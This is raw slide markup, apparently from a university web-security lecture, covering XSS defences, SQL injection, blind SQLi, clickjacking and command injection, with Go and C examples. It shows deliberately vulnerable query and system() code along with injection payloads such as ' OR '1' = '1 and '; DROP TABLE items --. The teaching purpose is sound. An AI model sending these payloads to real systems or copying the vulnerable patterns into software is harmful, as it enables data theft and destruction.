            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="223575" y="1469825"/>
            <a:ext cx="41949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DROP TABLE bots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59" name="Google Shape;359;p45"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="501950" y="2202375"/>
            <a:ext cx="4986300" cy="615600"/>
            <a:chOff x="501950" y="2202375"/>
            <a:chExt cx="4986300" cy="615600"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="360" name="Google Shape;360;p45"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="361" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3726650" y="2510175"/>
              <a:ext cx="1761600" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln cap="flat" cmpd="sng" w="19050">
              <a:solidFill>
                <a:srgbClr val="E69138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61" name="Google Shape;361;p45"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="501950" y="2202375"/>
              <a:ext cx="3224700" cy="6156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This statement results in the entire </a:t>
              </a:r>
              <a:r>
                <a:rPr b="1" lang="en">
                  <a:latin typeface="Courier New"/>
                  <a:ea typeface="Courier New"/>
                  <a:cs typeface="Courier New"/>
                  <a:sym typeface="Courier New"/>
                </a:rPr>
                <a:t>bots</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en"/>
                <a:t> table being deleted</a:t>
              </a:r>
              <a:endParaRPr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XSS Defenses</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p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HTML sanitization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Replace control characters with data sequences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/>
              <a:t> becomes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&amp;lt;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■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/>
              <a:t> becomes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&amp;quot;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a trusted library to sanitize inputs for you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Templates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Library creates the HTML based on a template and automatically handles all sanitization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Content Security Policy (CSP)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Instruct the browser to only use resources loaded from specific places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Limits JavaScript: only scripts from trusted sources are run in the browser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Enforced by the browser</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="88" name="Google Shape;8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6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Syntax Characters</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="367" name="Google Shape;367;p46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lang="en"/>
              <a:t> (two dashes) is used for single-line comments (like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#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> in Python or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"/>
              <a:t> in C)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Semicolons separate different statements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○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UPDATE items SET price = 2 WHERE id = 4;</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1"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SELECT price FROM items WHERE id = 4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Returns a single column with a row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/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>only if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> there already exists a row with ID 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SQL is really complicated, but you only need to know the basics for this class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8" name="Google Shape;368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7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Go HTTP Handler (Again)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="374" name="Google Shape;374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5" name="Google Shape;375;p47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1220400" y="1655725"/>
            <a:ext cx="6703200" cy="1262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handleGetItems(w http.ResponseWriter, r *http.Request) {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itemName := r.URL.Query()["item"][0]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db := getDB()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:= fmt.Sprintf(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"SELECT name, price FROM items WHERE name = '%s'", itemName</a:t>
            </a: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row, err := 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db.QueryRow(query)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6" name="Google Shape;376;p47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1220400" y="4533775"/>
            <a:ext cx="6703200" cy="338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SELECT item, price FROM items WHERE name = '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paperclips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'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7" name="Google Shape;377;p47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1220400" y="3556450"/>
            <a:ext cx="6703200" cy="338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https://vulnerable.com/get-items?item=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paperclips</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="10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8" name="Google Shape;378;p47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1220400" y="12555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379" name="Google Shape;379;p47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1220400" y="3156250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sp>
        <p:nvSpPr>
          <p:cNvPr id="380" name="Google Shape;380;p47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1220400" y="4133575"/>
            <a:ext cx="80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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="381" name="Google Shape;381;p47"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5128700" y="2446113"/>
            <a:ext cx="3724800" cy="1029600"/>
            <a:chOff x="5128700" y="2446113"/>
            <a:chExt cx="3724800" cy="1029600"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="382" name="Google Shape;382;p47"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5128700" y="3075513"/>
              <a:ext cx="3724800" cy="4002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Remember this string manipulation issue?</a:t>
              </a:r>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="383" name="Google Shape;383;p47"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="382" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="6731300" y="2446113"/>
              <a:ext cx="259800" cy="62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8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Go HTTP Handler (Again)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="389" name="Google Shape;389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0" name="Google Shape;390;p48"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1220400" y="1655725"/>
            <a:ext cx="6703200" cy="1262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handleGetItems(w http.ResponseWriter, r *http.Request) {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itemName := r.URL.Query()["item"][0]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db := getDB()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:= fmt.Sprintf(</a:t>
            </a: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"SELECT name, price FROM items WHERE name = '%s'", itemName</a:t>
            </a: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row, err := </a:t>
            </a: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db.QueryRow(query)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1" name="Google Shape;391;p48"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1220400" y="4533775"/>
            <a:ext cx="6703200" cy="338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SELECT item, price FROM items WHERE name = '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'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2" name="Google Shape;392;p48"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1220400" y="3556450"/>
            <a:ext cx="6703200" cy="338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https://vulnerable.com/get-items?item=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endParaRPr b="1" sz="10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3" name="Google Shape;393;p48"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1220400" y="12555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394" name="Google Shape;394;p48"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1220400" y="3156250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sp>
        <p:nvSpPr>
          <p:cNvPr id="395" name="Google Shape;395;p48"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1220400" y="4133575"/>
            <a:ext cx="80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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="396" name="Google Shape;396;p48"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4747025" y="3010850"/>
            <a:ext cx="3440400" cy="1595100"/>
            <a:chOff x="4747025" y="3010850"/>
            <a:chExt cx="3440400" cy="1595100"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="397" name="Google Shape;397;p48"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5044625" y="3010850"/>
              <a:ext cx="3142800" cy="6156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Invalid SQL executed by the server, 500 Internal Server Error</a:t>
              </a:r>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="398" name="Google Shape;398;p48"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="397" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="4747025" y="3626450"/>
              <a:ext cx="1869000" cy="979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9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Go HTTP Handler (Again)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="404" name="Google Shape;404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5" name="Google Shape;405;p49"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1220400" y="1655725"/>
            <a:ext cx="6703200" cy="1262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handleGetItems(w http.ResponseWriter, r *http.Request) {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itemName := r.URL.Query()["item"][0]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db := getDB()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:= fmt.Sprintf(</a:t>
            </a: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"SELECT name, price FROM items WHERE name = '%s'", itemName</a:t>
            </a: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row, err := </a:t>
            </a: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db.QueryRow(query)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6" name="Google Shape;406;p49"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1220400" y="4533775"/>
            <a:ext cx="6703200" cy="338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SELECT item, price FROM items WHERE name = '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 OR '1' = '1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'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7" name="Google Shape;407;p49"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1220400" y="3556450"/>
            <a:ext cx="6703200" cy="338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https://vulnerable.com/get-items?item=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 OR '1' = '1</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="10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8" name="Google Shape;408;p49"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1220400" y="12555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409" name="Google Shape;409;p49"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1220400" y="3156250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sp>
        <p:nvSpPr>
          <p:cNvPr id="410" name="Google Shape;410;p49"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1220400" y="4133575"/>
            <a:ext cx="80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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="411" name="Google Shape;411;p49"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5348650" y="3048550"/>
            <a:ext cx="3388350" cy="1525200"/>
            <a:chOff x="5348650" y="3048550"/>
            <a:chExt cx="3388350" cy="1525200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="412" name="Google Shape;412;p49"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5788300" y="3048550"/>
              <a:ext cx="2948700" cy="6156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This is essentially OR TRUE, so returns every item!</a:t>
              </a:r>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="413" name="Google Shape;413;p49"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="412" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="5348650" y="3664150"/>
              <a:ext cx="1914000" cy="90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0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Go HTTP Handler (Again)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="419" name="Google Shape;419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0" name="Google Shape;420;p50"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1220400" y="1655725"/>
            <a:ext cx="6703200" cy="1262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handleGetItems(w http.ResponseWriter, r *http.Request) {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itemName := r.URL.Query()["item"][0]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db := getDB()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:= fmt.Sprintf(</a:t>
            </a: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"SELECT name, price FROM items WHERE name = '%s'", itemName</a:t>
            </a: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row, err := </a:t>
            </a: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db.QueryRow(query)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1" name="Google Shape;421;p50"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1220400" y="4533775"/>
            <a:ext cx="6703200" cy="338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SELECT item, price FROM items WHERE name = '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'; DROP TABLE items --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'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2" name="Google Shape;422;p50"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1220400" y="3556450"/>
            <a:ext cx="6703200" cy="338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https://vulnerable.com/get-items?item=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'; DROP TABLE items --</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="10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3" name="Google Shape;423;p50"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1220400" y="12555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424" name="Google Shape;424;p50"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1220400" y="3156250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sp>
        <p:nvSpPr>
          <p:cNvPr id="425" name="Google Shape;425;p50"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1220400" y="4133575"/>
            <a:ext cx="80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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="426" name="Google Shape;426;p50"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2347975" y="2571750"/>
            <a:ext cx="3504900" cy="2001900"/>
            <a:chOff x="2347975" y="2571750"/>
            <a:chExt cx="3504900" cy="2001900"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="427" name="Google Shape;427;p50"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2347975" y="2571750"/>
              <a:ext cx="3504900" cy="10467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For this payload: End the first quote (</a:t>
              </a:r>
              <a:r>
                <a:rPr b="1" lang="en">
                  <a:latin typeface="Courier New"/>
                  <a:ea typeface="Courier New"/>
                  <a:cs typeface="Courier New"/>
                  <a:sym typeface="Courier New"/>
                </a:rPr>
                <a:t>'</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en"/>
                <a:t>), then start a new statement (</a:t>
              </a:r>
              <a:r>
                <a:rPr b="1" lang="en">
                  <a:latin typeface="Courier New"/>
                  <a:ea typeface="Courier New"/>
                  <a:cs typeface="Courier New"/>
                  <a:sym typeface="Courier New"/>
                </a:rPr>
                <a:t>DROP TABLE items</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en"/>
                <a:t>), then comment out the remaining quote (</a:t>
              </a:r>
              <a:r>
                <a:rPr b="1" lang="en">
                  <a:latin typeface="Courier New"/>
                  <a:ea typeface="Courier New"/>
                  <a:cs typeface="Courier New"/>
                  <a:sym typeface="Courier New"/>
                </a:rPr>
                <a:t>--</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en"/>
                <a:t>)</a:t>
              </a:r>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="428" name="Google Shape;428;p50"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="427" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4100425" y="3618450"/>
              <a:ext cx="963600" cy="955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1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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="434" name="Google Shape;434;p51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SQL injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>SQLi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>): Injecting SQL into queries constructed by the server to cause malicious behavior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Typically caused by using vulnerable string manipulation for SQL queries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Allows the attacker to execute arbitrary SQL on the SQL server!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Leak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Add records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Modify records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Delete records/tables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Basically anything that the SQL server can do</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="435" name="Google Shape;435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2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Exploits of a Mom</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="441" name="Google Shape;441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Exploits of a Mom" id="442" name="Google Shape;442;p52" title="Her daughter is named Help I'm trapped in a driver's license factory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175" y="1687925"/>
            <a:ext cx="6343650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3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Roadside SQLi</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="448" name="Google Shape;448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9" name="Google Shape;44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8588" y="1148375"/>
            <a:ext cx="5326833" cy="399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4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Blind SQL Injection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="455" name="Google Shape;455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6" name="Google Shape;456;p54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all SQL queries are used in a way that is visible to the user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Visible: Shopping carts, comment threads, list of accounts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Blind: Password verification, user account creation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Some SQL injection vulnerabilities only return a true/false as a way of determining whether your exploit worked!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Blind SQL injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: SQL injection attacks where little to no feedback is provided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Attacks become more </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>annoying</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>, but vulnerabilities are still exploitable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Automated SQL injection detection and exploitation makes this less of an issue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Attackers will use automated tools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2" name="Google Shape;462;p55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Blind SQL Injection Tools</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="463" name="Google Shape;463;p55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sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: An automated tool to find and exploit SQL injection vulnerabilities on web servers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Supports pretty much all database systems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Supports blind SQL injection (even through timing side channels)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Supports “escaping” from the database server to run commands in the operating system itself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Takeaway</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: “Harder” is harder only until someone makes a tool to automate the attack</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="464" name="Google Shape;464;p55"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="50731"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5486325" y="3030250"/>
            <a:ext cx="3498101" cy="124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325" y="1848133"/>
            <a:ext cx="3498100" cy="1182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Clickjacking</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="94" name="Google Shape;94;p20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="198500" y="1246825"/>
            <a:ext cx="8520600" cy="3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Clickjacking: Trick the victim into clicking on something from the attacker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 vulnerability: the browser trusts the user’s clicks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the user clicks on something, the browser assumes the user intended to click there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Fake download buttons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Show the user one frame, when they’re actually clicking on another invisible frame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Temporal attack: Change the cursor just before the user clicks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Cursorjacking: Create a fake mouse cursor with JavaScript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Enforce visual integrity: Focus the user’s vision on the relevant part of the screen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Enforce temporal integrity: Give the user time to understand what they’re clicking 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Ask the user for confirmation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Frame-busting: The legitimate website forbids other websites from embedding it in an iframe</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="95" name="Google Shape;9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6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Defenses</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="471" name="Google Shape;471;p56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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Input sanitization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Option #1: Disallow special characters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Option #2: Escape special characters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Like XSS, SQL injection relies on certain characters that are interpreted specially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SQL allows special characters to be escaped with backslash (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\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>) to be treated as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Drawback: Difficult to build a good escaper that handles all edge cases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should </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>never</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> try to build one yourself!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Good as a defense-in-depth measure</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="472" name="Google Shape;472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3" name="Google Shape;473;p56"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1220400" y="3524325"/>
            <a:ext cx="6703200" cy="14160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handleGetItems(w http.ResponseWriter, r *http.Request) {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itemName := r.URL.Query()["item"][0]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itemName = sqlEscape(itemName)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db := getDB()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:= fmt.Sprintf(</a:t>
            </a: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"SELECT name, price FROM items WHERE name = '%s'", itemName</a:t>
            </a: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row, err := </a:t>
            </a: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db.QueryRow(query)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7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Defenses</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="479" name="Google Shape;479;p57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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Prepared statements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Usually represented as a question mark (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en"/>
              <a:t>) when writing SQL statements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Idea: Instead of trying to escape characters before parsing, parse the SQL first, then insert the data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When the parser encounters the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en"/>
              <a:t>, it fixes it as a single node in the syntax tree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After parsing, only </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>then</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>, it inserts data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untrusted input never has a chance to be parsed, only ever treated as data</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="480" name="Google Shape;480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1" name="Google Shape;481;p57"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1220400" y="3524325"/>
            <a:ext cx="6703200" cy="1108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handleGetItems(w http.ResponseWriter, r *http.Request) {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itemName := r.URL.Query()["item"][0]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db := getDB()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row, err := </a:t>
            </a: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db.QueryRow("SELECT name, price FROM items WHERE name = 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", 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itemName</a:t>
            </a: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8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Defenses</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="487" name="Google Shape;487;p58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Biggest downside to prepared statements: Not part of the SQL standard!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Instead, SQL drivers rely on the actual SQL implementation (e.g. MySQL, PostgreSQL, etc.) to implement prepared statements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Must rely on the API to correctly convert the prepared statement into implementation-specific protocol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Again: Consider human factors!</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="488" name="Google Shape;488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Injection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="494" name="Google Shape;494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0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Injection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="500" name="Google Shape;500;p60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Untrusted data being treated incorrectly is not a SQL-specific problem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happen in other languages too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Consider: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/>
              <a:t> function in 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function takes a string as input, spawns a shell, and executes the string input as a command in the shell</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="501" name="Google Shape;501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1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/>
              <a:t> Command Injection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="507" name="Google Shape;507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8" name="Google Shape;508;p61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1220400" y="1655725"/>
            <a:ext cx="6703200" cy="9543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find_employee(char *regex) {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char cmd[512];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snprintf(cmd, sizeof cmd, "grep '%s' phonebook.txt", regex);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system(cmd);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9" name="Google Shape;509;p61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1220400" y="4533775"/>
            <a:ext cx="6703200" cy="338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grep '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weaver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' phonebook.txt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0" name="Google Shape;510;p61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1220400" y="3556450"/>
            <a:ext cx="6703200" cy="338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regex = "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weaver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b="1" sz="10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1" name="Google Shape;511;p61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1220400" y="12555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512" name="Google Shape;512;p61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1220400" y="3156250"/>
            <a:ext cx="106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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="513" name="Google Shape;513;p61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1220400" y="4133575"/>
            <a:ext cx="18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/>
              <a:t> Command</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="514" name="Google Shape;514;p61"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3407900" y="2207800"/>
            <a:ext cx="2253600" cy="1307400"/>
            <a:chOff x="3407900" y="2207800"/>
            <a:chExt cx="2253600" cy="1307400"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="515" name="Google Shape;515;p61"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3407900" y="3115000"/>
              <a:ext cx="2253600" cy="4002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String manipulation again!</a:t>
              </a:r>
